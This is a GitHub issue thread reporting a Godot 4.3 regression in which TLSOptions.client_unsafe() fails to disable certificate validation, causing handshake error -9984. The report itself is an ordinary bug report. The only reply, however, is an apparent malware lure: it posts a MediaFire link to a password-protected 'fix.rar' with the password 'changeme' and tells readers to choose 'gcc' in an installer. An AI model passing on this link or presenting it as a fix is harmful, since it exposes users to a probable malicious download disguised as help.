### ISSUE TITLE
TLS Handshake error when using TLSOptions.client_unsafe

### ISSUE THREAD

**Issue by Faless** [godotengine/godot#96170]
### Tested versions

- Reproducible in Godot v4.3-stable
- Not reproducible in Godot v4.2.2-stable

### System information

Debian 12

### Issue description

As reported in https://github.com/godotengine/godot/issues/85953#issuecomment-2293127946 using `TLSOptions.client_unsafe()` doesn't behave correctly in Godot 4.3 and seem not to disable certificate validation reporting `TLS handshake error: -9984` instead (`MBEDTLS_ERR_X509_CERT_VERIFY_FAILED = -0x2700`).

### Steps to reproduce

See MRP, or try to connect via StreamPeerTCP/HTTPClient/HTTPRequest using `TLSOption.client_unsafe`.

### Minimal reproduction project (MRP)

[tls_client_unsafe_mrp.zip](https://github.com/user-attachments/files/16763783/tls_client_unsafe_mrp.zip)

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
